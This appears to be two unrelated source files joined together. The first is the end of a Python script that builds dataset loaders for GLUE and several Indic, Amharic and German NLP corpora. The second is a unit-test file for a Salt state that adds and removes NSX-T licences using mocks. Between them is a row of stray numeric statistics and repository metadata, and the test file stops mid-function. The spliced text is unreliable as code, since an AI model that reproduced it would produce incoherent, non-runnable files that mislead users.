dev_dataset_aux_1 = STS_BAuxDataset('../data/glue_data/STS-B/dev/', data_frame=STS_B_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
dev_dataset_aux_2 = STS_BAuxDataset('../data/glue_data/STS-B/dev/', data_frame=STS_B_dev_data_frame, DT_G=DT_G, is_sentence_2=True)
elif(config.experiment == 'MRPC'):
tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=True)
MRPC_train_data_frame = utils.get_MRPC_data_frame(config.MRPC_train_data_path)
train_LM_dataset = MRPCLMDataset(MRPC_train_data_frame, tokenizer)
train_dataset_aux_1 = MRPCAuxDataset(root='../data/glue_data/MRPC/train/', data_frame=MRPC_train_data_frame, DT_G=DT_G, is_sentence_1=True)
train_dataset_aux_2 = MRPCAuxDataset(root='../data/glue_data/MRPC/train/', data_frame=MRPC_train_data_frame, DT_G=DT_G, is_sentence_2=True)
MRPC_dev_data_frame = utils.get_MRPC_data_frame(config.MRPC_dev_data_path)
dev_LM_dataset = MRPCLMDataset(MRPC_dev_data_frame, tokenizer)
dev_dataset_aux_1 = MRPCAuxDataset(root='../data/glue_data/MRPC/dev/', data_frame=MRPC_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
dev_dataset_aux_2 = MRPCAuxDataset(root='../data/glue_data/MRPC/dev/', data_frame=MRPC_dev_data_frame, DT_G=DT_G, is_sentence_2=True)
elif(config.experiment == 'SST_2'):
tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=True)
SST_2_train_data_frame = utils.get_SST_2_data_frame(config.SST_2_train_data_path)
train_LM_dataset = SST_2LMDataset(SST_2_train_data_frame, tokenizer)
train_dataset_aux_1 = SST_2AuxDataset(root='../data/glue_data/SST-2/train/', data_frame=SST_2_train_data_frame, DT_G=DT_G, is_sentence_1=True)
train_dataset_aux_2 = None
SST_2_dev_data_frame = utils.get_SST_2_data_frame(config.SST_2_dev_data_path)
dev_LM_dataset = SST_2LMDataset(SST_2_dev_data_frame, tokenizer)
dev_dataset_aux_1 = SST_2AuxDataset(root='../data/glue_data/SST-2/dev/', data_frame=SST_2_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
dev_dataset_aux_2 = None
elif(config.experiment == 'CoLA'):
tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=True)
CoLA_train_data_frame = utils.get_CoLA_data_frame(config.CoLA_train_data_path)
train_LM_dataset = CoLA_LMDataset(CoLA_train_data_frame, tokenizer)
train_dataset_aux_1 = CoLAAuxDataset(root='../data/glue_data/CoLA/train/', data_frame=CoLA_train_data_frame, DT_G=DT_G, is_sentence_1=True)
train_dataset_aux_2 = None
CoLA_dev_data_frame = utils.get_CoLA_data_frame(config.CoLA_dev_data_path)
dev_LM_dataset = CoLA_LMDataset(CoLA_dev_data_frame, tokenizer)
dev_dataset_aux_1 = CoLAAuxDataset(root='../data/glue_data/CoLA/dev/', data_frame=CoLA_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
dev_dataset_aux_2 = None
elif(config.experiment == 'wnli_translated'):
tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
WNLI_translated_train_data_frame = utils.get_WNLI_translated_data_frame(config.WNLI_translated_train_data_path)
train_LM_dataset = WNLI_TranslatedLMDataset(WNLI_translated_train_data_frame, tokenizer)
train_dataset_aux_1 = WNLI_TranslatedAuxDataset(root='../data/wnli-translated/hi/train/', data_frame=WNLI_translated_train_data_frame, DT_G=DT_G, is_sentence_1=True)
train_dataset_aux_2 = WNLI_TranslatedAuxDataset(root='../data/wnli-translated/hi/train/', data_frame=WNLI_translated_train_data_frame, DT_G=DT_G, is_sentence_2=True)
WNLI_translated_dev_data_frame = utils.get_WNLI_translated_data_frame(config.WNLI_translated_dev_data_path)
dev_LM_dataset = WNLI_TranslatedLMDataset(WNLI_translated_dev_data_frame, tokenizer)
dev_dataset_aux_1 = WNLI_TranslatedAuxDataset(root='../data/wnli-translated/hi/dev/', data_frame=WNLI_translated_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
dev_dataset_aux_2 = WNLI_TranslatedAuxDataset(root='../data/wnli-translated/hi/dev/', data_frame=WNLI_translated_dev_data_frame, DT_G=DT_G, is_sentence_2=True)
elif(config.experiment == 'iitp_product'):
tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
IITP_product_reviews_train_data_frame = utils.get_IITP_product_reviews_data_frame(config.IITP_product_reviews_train_data_path)
train_LM_dataset = IITP_Product_ReviewsLMDataset(IITP_product_reviews_train_data_frame, tokenizer)
train_dataset_aux_1 = IITP_Product_ReviewsAuxDataset(root='../data/iitp-product-reviews/hi/train/', data_frame=IITP_product_reviews_train_data_frame, DT_G=DT_G, is_sentence_1=True)
train_dataset_aux_2 = None
IITP_product_reviews_dev_data_frame = utils.get_IITP_product_reviews_data_frame(config.IITP_product_reviews_dev_data_path)
dev_LM_dataset = IITP_Product_ReviewsLMDataset(IITP_product_reviews_dev_data_frame, tokenizer)
dev_dataset_aux_1 = IITP_Product_ReviewsAuxDataset(root='../data/iitp-product-reviews/hi/test/', data_frame=IITP_product_reviews_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
dev_dataset_aux_2 = None
elif(config.experiment == 'midas_discourse'):
tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
MIDAS_discourse_train_json = utils.get_MIDAS_discourse_json(config.MIDAS_discourse_train_json_path)
train_LM_dataset = MIDAS_DiscourseLMDataset(MIDAS_discourse_train_json, tokenizer)
train_dataset_aux_1 = MIDAS_DiscourseAuxDataset(root='../data/midas-discourse/hi/train/', json_data=MIDAS_discourse_train_json, DT_G=DT_G, is_sentence_1=True)
train_dataset_aux_2 = None
MIDAS_discourse_dev_json = utils.get_MIDAS_discourse_json(config.MIDAS_discourse_dev_json_path)
dev_LM_dataset = MIDAS_DiscourseLMDataset(MIDAS_discourse_dev_json, tokenizer)
dev_dataset_aux_1 = MIDAS_DiscourseAuxDataset(root='../data/midas-discourse/hi/test/', json_data=MIDAS_discourse_dev_json, DT_G=DT_G, is_sentence_1=True)
dev_dataset_aux_2 = None
elif(config.experiment == 'dpil_subtask_1'):
tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
DPIL_subtask_1_train_data_frame = utils.get_DPIL_data_frame(config.DPIL_subtask_1_train_path)
train_LM_dataset = DPIL_Subtask_1LMDataset(DPIL_subtask_1_train_data_frame, tokenizer)
train_dataset_aux_1 = DPIL_Subtask_1AuxDataset(root='../data/DPIL_csv/subtask_1/train/', data_frame=DPIL_subtask_1_train_data_frame, DT_G=DT_G, is_sentence_1=True)
train_dataset_aux_2 = DPIL_Subtask_1AuxDataset(root='../data/DPIL_csv/subtask_1/train/', data_frame=DPIL_subtask_1_train_data_frame, DT_G=DT_G, is_sentence_2=True)
DPIL_subtask_1_dev_data_frame = utils.get_DPIL_data_frame(config.DPIL_subtask_1_dev_path)
dev_LM_dataset = DPIL_Subtask_1LMDataset(DPIL_subtask_1_dev_data_frame, tokenizer)
dev_dataset_aux_1 = DPIL_Subtask_1AuxDataset(root='../data/DPIL_csv/subtask_1/test/', data_frame=DPIL_subtask_1_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
dev_dataset_aux_2 = DPIL_Subtask_1AuxDataset(root='../data/DPIL_csv/subtask_1/test/', data_frame=DPIL_subtask_1_dev_data_frame, DT_G=DT_G, is_sentence_2=True)
elif(config.experiment == 'dpil_subtask_2'):
tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
DPIL_subtask_2_train_data_frame = utils.get_DPIL_data_frame(config.DPIL_subtask_2_train_path)
train_LM_dataset = DPIL_Subtask_2LMDataset(DPIL_subtask_2_train_data_frame, tokenizer)
train_dataset_aux_1 = DPIL_Subtask_2AuxDataset(root='../data/DPIL_csv/subtask_2/train/', data_frame=DPIL_subtask_2_train_data_frame, DT_G=DT_G, is_sentence_1=True)
train_dataset_aux_2 = DPIL_Subtask_2AuxDataset(root='../data/DPIL_csv/subtask_2/train/', data_frame=DPIL_subtask_2_train_data_frame, DT_G=DT_G, is_sentence_2=True)
DPIL_subtask_2_dev_data_frame = utils.get_DPIL_data_frame(config.DPIL_subtask_2_dev_path)
dev_LM_dataset = DPIL_Subtask_2LMDataset(DPIL_subtask_2_dev_data_frame, tokenizer)
dev_dataset_aux_1 = DPIL_Subtask_2AuxDataset(root='../data/DPIL_csv/subtask_2/test/', data_frame=DPIL_subtask_2_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
dev_dataset_aux_2 = DPIL_Subtask_2AuxDataset(root='../data/DPIL_csv/subtask_2/test/', data_frame=DPIL_subtask_2_dev_data_frame, DT_G=DT_G, is_sentence_2=True)
elif(config.experiment == 'KhondokerIslam_bengali'):
tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
KhondokerIslam_bengali_train_data_frame = utils.get_KhondokerIslam_bengali_data_frame(config.KhondokerIslam_bengali_train_path)
train_LM_dataset = KhondokerIslam_BengaliLMDataset(KhondokerIslam_bengali_train_data_frame, tokenizer)
train_dataset_aux_1 = KhondokerIslam_BengaliAuxDataset(root='../data/KhondokerIslam_Bengali_Sentiment/train/', data_frame=KhondokerIslam_bengali_train_data_frame, DT_G=DT_G, is_sentence_1=True)
train_dataset_aux_2 = None
KhondokerIslam_bengali_dev_data_frame = utils.get_KhondokerIslam_bengali_data_frame(config.KhondokerIslam_bengali_dev_path)
dev_LM_dataset = KhondokerIslam_BengaliLMDataset(KhondokerIslam_bengali_dev_data_frame, tokenizer)
dev_dataset_aux_1 = KhondokerIslam_BengaliAuxDataset(root='../data/KhondokerIslam_Bengali_Sentiment/test/', data_frame=KhondokerIslam_bengali_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
dev_dataset_aux_2 = None
elif(config.experiment == 'rezacsedu_sentiment'):
tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
rezacsedu_sentiment_train_data_frame = utils.get_rezacsedu_sentiment_data_frame(config.rezacsedu_sentiment_train_path)
train_LM_dataset = Rezacsedu_SentimentLMDataset(rezacsedu_sentiment_train_data_frame, tokenizer)
train_dataset_aux_1 = Rezacsedu_SentimentAuxDataset(root='../data/rezacsedu_sentiment/train/', data_frame=rezacsedu_sentiment_train_data_frame, DT_G=DT_G, is_sentence_1=True)
train_dataset_aux_2 = None
rezacsedu_sentiment_dev_data_frame = utils.get_rezacsedu_sentiment_data_frame(config.rezacsedu_sentiment_test_path)
dev_LM_dataset = Rezacsedu_SentimentLMDataset(rezacsedu_sentiment_dev_data_frame, tokenizer)
dev_dataset_aux_1 = Rezacsedu_SentimentAuxDataset(root='../data/rezacsedu_sentiment/test/', data_frame=rezacsedu_sentiment_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
dev_dataset_aux_2 = None
elif(config.experiment == 'BEmoC'):
tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
BEmoC_train_data_frame = utils.get_BEmoC_data_frame(config.BEmoC_train_path)
train_LM_dataset = BEmoCLMDataset(BEmoC_train_data_frame, tokenizer)
train_dataset_aux_1 = BEmoCLMDatasetAuxDataset(root='../data/BEmoC/train/', data_frame=BEmoC_train_data_frame, DT_G=DT_G, is_sentence_1=True)
train_dataset_aux_2 = None
BEmoC_dev_data_frame = utils.get_BEmoC_data_frame(config.BEmoC_dev_path)
dev_LM_dataset = BEmoCLMDataset(BEmoC_dev_data_frame, tokenizer)
dev_dataset_aux_1 = BEmoCLMDatasetAuxDataset(root='../data/BEmoC/test/', data_frame=BEmoC_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
dev_dataset_aux_2 = None
elif(config.experiment == 'seid_amharic_sentiment'):
tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
Seid_amharic_train_data_frame = utils.get_Seid_amharic_sentiment_data_frame(config.Seid_Amharic_Sentiment_train_path)
train_LM_dataset = Seid_Amharic_SentimentLMDataset(Seid_amharic_train_data_frame, tokenizer)
train_dataset_aux_1 = Seid_Amharic_SentimentAuxDataset(root='../data/seid_amharic_sentiment/train/', data_frame=Seid_amharic_train_data_frame, DT_G=DT_G, is_sentence_1=True)
train_dataset_aux_2 = None
Seid_amharic_dev_data_frame = utils.get_Seid_amharic_sentiment_data_frame(config.Seid_Amharic_Sentiment_dev_path)
dev_LM_dataset = Seid_Amharic_SentimentLMDataset(Seid_amharic_dev_data_frame, tokenizer)
dev_dataset_aux_1 = Seid_Amharic_SentimentAuxDataset(root='../data/seid_amharic_sentiment/test/', data_frame=Seid_amharic_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
dev_dataset_aux_2 = None
elif(config.experiment == 'seid_amharic_cleaned_sentiment'):
tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
Seid_amharic_train_data_frame = utils.get_Seid_amharic_sentiment_cleaned_data_frame(config.Seid_Amharic_Sentiment_train_path)
train_LM_dataset = Seid_Amharic_SentimentLMDataset(Seid_amharic_train_data_frame, tokenizer)
train_dataset_aux_1 = Seid_Amharic_Cleaned_SentimentAuxDataset(root='../data/seid_amharic_sentiment/train/', data_frame=Seid_amharic_train_data_frame, DT_G=DT_G, is_sentence_1=True)
train_dataset_aux_2 = None
Seid_amharic_dev_data_frame = utils.get_Seid_amharic_sentiment_cleaned_data_frame(config.Seid_Amharic_Sentiment_dev_path)
dev_LM_dataset = Seid_Amharic_SentimentLMDataset(Seid_amharic_dev_data_frame, tokenizer)
dev_dataset_aux_1 = Seid_Amharic_Cleaned_SentimentAuxDataset(root='../data/seid_amharic_sentiment/test/', data_frame=Seid_amharic_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
dev_dataset_aux_2 = None
elif(config.experiment == 'germeval2018_subtask_1'):
tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
germeval2018_subtask_train_data_frame = utils.get_germeval2018_data_frame(config.germeval2018_train_path)
train_LM_dataset = Germeval2018LMDataset(germeval2018_subtask_train_data_frame, tokenizer)
train_dataset_aux_1 = Germeval2018_Subtask_1AuxDataset(root='../data/germeval2018/train/', data_frame=germeval2018_subtask_train_data_frame, DT_G=DT_G, is_sentence_1=True)
train_dataset_aux_2 = None
germeval2018_subtask_dev_data_frame = utils.get_germeval2018_data_frame(config.germeval2018_dev_path)
dev_LM_dataset = Germeval2018LMDataset(germeval2018_subtask_dev_data_frame, tokenizer)
dev_dataset_aux_1 = Germeval2018_Subtask_1AuxDataset(root='../data/germeval2018/test/', data_frame=germeval2018_subtask_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
dev_dataset_aux_2 = None
elif(config.experiment == 'germeval2018_subtask_2'):
tokenizer = AutoTokenizer.from_pretrained(config.lm_model_name, do_lower_case=False)
germeval2018_subtask_train_data_frame = utils.get_germeval2018_data_frame(config.germeval2018_train_path)
train_LM_dataset = Germeval2018LMDataset(germeval2018_subtask_train_data_frame, tokenizer)
train_dataset_aux_1 = Germeval2018_Subtask_2AuxDataset(root='../data/germeval2018/train/', data_frame=germeval2018_subtask_train_data_frame, DT_G=DT_G, is_sentence_1=True)
train_dataset_aux_2 = None
germeval2018_subtask_dev_data_frame = utils.get_germeval2018_data_frame(config.germeval2018_dev_path)
dev_LM_dataset = Germeval2018LMDataset(germeval2018_subtask_dev_data_frame, tokenizer)
dev_dataset_aux_1 = Germeval2018_Subtask_2AuxDataset(root='../data/germeval2018/test/', data_frame=germeval2018_subtask_dev_data_frame, DT_G=DT_G, is_sentence_1=True)
dev_dataset_aux_2 = None
if(train_dataset_aux_2 is not None):
train_loader = GraphDataLoader(WrapperDataset(train_LM_dataset, train_dataset_aux_1, train_dataset_aux_2), batch_size=config.batch_size)
else:
train_loader = GraphDataLoader(WrapperDataset(train_LM_dataset, train_dataset_aux_1), batch_size=config.batch_size)
batch = next(iter(train_loader))
if(len(batch) == 3):
[[input_ids, token_type_ids, attention_mask], batch_aux_1, batch_aux_2] = batch
else:
[[input_ids, token_type_ids, attention_mask], batch_aux_1] = batch
batch_aux_2 = None
print(f'input_ids.shape: {input_ids.shape}')
print(f'token_type_ids.shape: {token_type_ids.shape}')
print(f'attention_mask.shape: { attention_mask.shape}')
print(f'batch_aux_1: {batch_aux_1}')
if(batch_aux_2 is not None):
print(f'batch_aux_2: {batch_aux_2}')
if(dev_dataset_aux_2 is not None):
dev_loader = GraphDataLoader(WrapperDataset(dev_LM_dataset, dev_dataset_aux_1, dev_dataset_aux_2), batch_size=config.batch_size)
else:
dev_loader = GraphDataLoader(WrapperDataset(dev_LM_dataset, dev_dataset_aux_1), batch_size=config.batch_size)
batch = next(iter(dev_loader))
if(len(batch) == 3):
[[input_ids, token_type_ids, attention_mask], batch_aux_1, batch_aux_2] = batch
else:
[[input_ids, token_type_ids, attention_mask], batch_aux_1] = batch
batch_aux_2 = None
print(f'input_ids.shape: {input_ids.shape}')
print(f'token_type_ids.shape: {token_type_ids.shape}')
print(f'attention_mask.shape: { attention_mask.shape}')
print(f'batch_aux_1: {batch_aux_1}')
if(batch_aux_2 is not None):
print(f'batch_aux_2: {batch_aux_2}')
| 47.698516
| 201
| 0.681071
| 11,207
| 80,372
| 4.515303
| 0.020523
| 0.074343
| 0.043416
| 0.025967
| 0.947454
| 0.933462
| 0.91214
| 0.905678
| 0.888524
| 0.869553
| 0
| 0.014806
| 0.215983
| 80,372
| 1,684
| 202
| 47.726841
| 0.78825
| 0
| 0
| 0.762186
| 0
| 0
| 0.097596
| 0.023491
| 0
| 0
| 0
| 0
| 0.025849
| 1
| 0.133678
| false
| 0
| 0.007386
| 0.049483
| 0.265879
| 0.045052
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a6c57c123c8c6ebb5b4879fa91088313f6cf1b76
| 17,859
|
py
|
Python
|
tests/unit/states/test_nsxt_license.py
|
kdsalvy/salt-ext-modules-vmware-1
|
9fdc941692e4c526f575f33b2ce23c1470582934
|
[
"Apache-2.0"
] | 10
|
2021-11-02T20:24:44.000Z
|
2022-03-11T05:54:27.000Z
|
tests/unit/states/test_nsxt_license.py
|
cmcmarrow/salt-ext-modules-vmware
|
c546a9f9ae121b7399dabae82f714117d0ab558d
|
[
"Apache-2.0"
] | 83
|
2021-10-01T15:13:02.000Z
|
2022-03-31T16:22:40.000Z
|
tests/unit/states/test_nsxt_license.py
|
cmcmarrow/salt-ext-modules-vmware
|
c546a9f9ae121b7399dabae82f714117d0ab558d
|
[
"Apache-2.0"
] | 15
|
2021-09-30T23:17:27.000Z
|
2022-03-23T06:54:22.000Z
|
from unittest.mock import MagicMock
from unittest.mock import patch
import pytest
import saltext.vmware.states.nsxt_license as nsxt_license
@pytest.fixture
def configure_loader_modules():
return {nsxt_license: {}}
def test_present_test_mode():
"""
Test to create license on NSX-T Manager
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
data = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
}
],
}
mock_get_licenses = MagicMock(return_value=data)
with patch.dict(nsxt_license.__salt__, {"nsxt_license.get_licenses": mock_get_licenses}):
with patch.dict(nsxt_license.__opts__, {"test": True}):
ret["comment"] = "License would be added to NSX-T Manager"
assert (
nsxt_license.present(
"create-license", "hostname", "admin", "password", "license_key"
)
== ret
)
def test_present_license_already_exists():
"""
Test to create license on NSX-T Manager when license already exists
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
data = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
}
],
}
mock_get_licenses = MagicMock(return_value=data)
with patch.dict(nsxt_license.__salt__, {"nsxt_license.get_licenses": mock_get_licenses}):
ret["result"] = True
ret["comment"] = "License key is already present"
assert (
nsxt_license.present("create-license", "hostname", "admin", "password", "dummy-key")
== ret
)
def test_present_create_new_license():
"""
Test to create license on NSX-T Manager when license is not present already
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
# notice the license_key value in data, it is different from what is being passed
get_licenses_data = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key-license",
"quantity": 0,
}
],
}
get_licenses_data_after_apply = {
"result_count": 2,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key-license",
"quantity": 0,
},
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
},
],
}
mock_get_licenses = MagicMock(side_effect=[get_licenses_data, get_licenses_data_after_apply])
apply_license_data = {
"capacity_type": "CPU",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
}
mock_apply_license = MagicMock(return_value=apply_license_data)
with patch.dict(
nsxt_license.__salt__,
{
"nsxt_license.get_licenses": mock_get_licenses,
"nsxt_license.apply_license": mock_apply_license,
},
):
ret["result"] = True
ret["comment"] = "License added successfully"
ret["changes"]["old"] = get_licenses_data
ret["changes"]["new"] = get_licenses_data_after_apply
with patch.dict(nsxt_license.__opts__, {"test": False}):
assert (
nsxt_license.present("create-license", "hostname", "admin", "password", "dummy-key")
== ret
)
def test_present_get_licenses_error():
"""
Test to create license on NSX-T Manager when there's an error while fetching existing licenses
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
data = {
"error": "Error occurred while retrieving the license. Please check logs for more details."
}
mock_get_licenses = MagicMock(return_value=data)
with patch.dict(nsxt_license.__salt__, {"nsxt_license.get_licenses": mock_get_licenses}):
ret["result"] = False
ret["comment"] = (
"Failed to get current licenses from NSX-T Manager :"
" Error occurred while retrieving the license. Please check logs for more details."
)
assert (
nsxt_license.present("create-license", "hostname", "admin", "password", "dummy-key")
== ret
)
def test_present_apply_license_error():
"""
Test to create license when there is an error while applying new license
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
# notice the license_key value in data, it is different from what is being passed
get_licenses_data = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key-license",
"quantity": 0,
}
],
}
mock_get_licenses = MagicMock(side_effect=[get_licenses_data])
apply_license_data = {
"error": "Error occurred while applying the license. Please check logs for more details."
}
mock_apply_license = MagicMock(return_value=apply_license_data)
with patch.dict(
nsxt_license.__salt__,
{
"nsxt_license.get_licenses": mock_get_licenses,
"nsxt_license.apply_license": mock_apply_license,
},
):
ret["result"] = False
ret["comment"] = (
"Failed to apply license to NSX-T Manager :"
" Error occurred while applying the license. Please check logs for more details."
)
with patch.dict(nsxt_license.__opts__, {"test": False}):
assert (
nsxt_license.present("create-license", "hostname", "admin", "password", "dummy-key")
== ret
)
def test_present_get_license_error_after_apply():
"""
Test to create license when there's an error while retrieving the licenses after applying new license
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
# notice the license_key value in data, it is different from what is being passed
get_licenses_data = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key-license",
"quantity": 0,
}
],
}
get_licenses_data_after_apply = {
"error": "Error occurred while retrieving the license. Please check logs for more details."
}
mock_get_licenses = MagicMock(side_effect=[get_licenses_data, get_licenses_data_after_apply])
apply_license_data = {
"capacity_type": "CPU",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
}
mock_apply_license = MagicMock(return_value=apply_license_data)
with patch.dict(
nsxt_license.__salt__,
{
"nsxt_license.get_licenses": mock_get_licenses,
"nsxt_license.apply_license": mock_apply_license,
},
):
ret["result"] = False
ret["comment"] = (
"Failed to retrieve licenses after applying current license from NSX-T Manager : "
"Error occurred while retrieving the license. Please check logs for more details."
)
with patch.dict(nsxt_license.__opts__, {"test": False}):
assert (
nsxt_license.present("create-license", "hostname", "admin", "password", "dummy-key")
== ret
)
def test_absent_test_mode():
"""
Test to remove license on NSX-T Manager
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
data = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
}
],
}
mock_get_licenses = MagicMock(return_value=data)
with patch.dict(nsxt_license.__salt__, {"nsxt_license.get_licenses": mock_get_licenses}):
with patch.dict(nsxt_license.__opts__, {"test": True}):
ret["comment"] = "License would be removed from NSX-T Manager"
assert (
nsxt_license.absent("create-license", "hostname", "admin", "password", "dummy-key")
== ret
)
def test_absent_license_does_not_exists():
"""
Test to remove license from NSX-T Manager when license doesn't exist
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
data = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
}
],
}
mock_get_licenses = MagicMock(return_value=data)
with patch.dict(nsxt_license.__salt__, {"nsxt_license.get_licenses": mock_get_licenses}):
ret["result"] = True
ret["comment"] = "License key is not present in NSX-T Manager"
assert (
nsxt_license.absent("create-license", "hostname", "admin", "password", "different-key")
== ret
)
def test_absent_delete_existing_license():
"""
Test to delete existing license from NSX-T Manager
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
# notice the license_key value in data, it is different from what is being passed
get_licenses_data_after_delete = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key-license",
"quantity": 0,
}
],
}
get_licenses_data = {
"result_count": 2,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key-license",
"quantity": 0,
},
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
},
],
}
mock_get_licenses = MagicMock(side_effect=[get_licenses_data, get_licenses_data_after_delete])
delete_license_data = {"message": "License deleted successfully"}
mock_delete_license = MagicMock(return_value=delete_license_data)
with patch.dict(
nsxt_license.__salt__,
{
"nsxt_license.get_licenses": mock_get_licenses,
"nsxt_license.delete_license": mock_delete_license,
},
):
ret["result"] = True
ret["comment"] = "License removed successfully"
ret["changes"]["old"] = get_licenses_data
ret["changes"]["new"] = get_licenses_data_after_delete
with patch.dict(nsxt_license.__opts__, {"test": False}):
assert (
nsxt_license.absent("create-license", "hostname", "admin", "password", "dummy-key")
== ret
)
def test_absent_get_licenses_error():
"""
Test to create license on NSX-T Manager when there's an error while fetching existing licenses
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
data = {
"error": "Error occurred while retrieving the license. Please check logs for more details."
}
mock_get_licenses = MagicMock(return_value=data)
with patch.dict(nsxt_license.__salt__, {"nsxt_license.get_licenses": mock_get_licenses}):
ret["result"] = False
ret["comment"] = (
"Failed to get current licenses from NSX-T Manager :"
" Error occurred while retrieving the license. Please check logs for more details."
)
assert (
nsxt_license.absent("create-license", "hostname", "admin", "password", "dummy-key")
== ret
)
def test_absent_apply_license_error():
"""
Test to create license when there is an error while applying new license
"""
ret = {"name": "create-license", "result": None, "comment": "", "changes": {}}
# notice the license_key value in data, it is different from what is being passed
get_licenses_data = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
}
],
}
mock_get_licenses = MagicMock(side_effect=[get_licenses_data])
delete_license_data = {
"error": "Error occurred while deleting the license. Please check logs for more details."
}
mock_delete_license = MagicMock(return_value=delete_license_data)
with patch.dict(
nsxt_license.__salt__,
{
"nsxt_license.get_licenses": mock_get_licenses,
"nsxt_license.delete_license": mock_delete_license,
},
):
ret["result"] = False
ret["comment"] = (
"Failed to delete license from NSX-T Manager :"
" Error occurred while deleting the license. Please check logs for more details."
)
with patch.dict(nsxt_license.__opts__, {"test": False}):
assert (
nsxt_license.absent("create-license", "hostname", "admin", "password", "dummy-key")
== ret
)
def test_absent_get_license_error_after_delete():
"""
Test to remove license when there's an error while retrieving the licenses after deleting existing license
"""
ret = {"name": "delete-license", "result": None, "comment": "", "changes": {}}
# notice the license_key value in data, it is different from what is being passed
get_licenses_data = {
"result_count": 1,
"results": [
{
"capacity_type": "USER",
"description": "NSX Data Center Enterprise Plus",
"expiry": 0,
"is_eval": False,
"is_expired": False,
"license_key": "dummy-key",
"quantity": 0,
}
],
}
get_licenses_data_after_apply = {
"error": "Error occurred while retrieving the license. Please check logs for more details."
}
mock_get_licenses = MagicMock(side_effect=[get_licenses_data, get_licenses_data_after_apply])
delete_license_data = {"message": "License deleted successfully"}
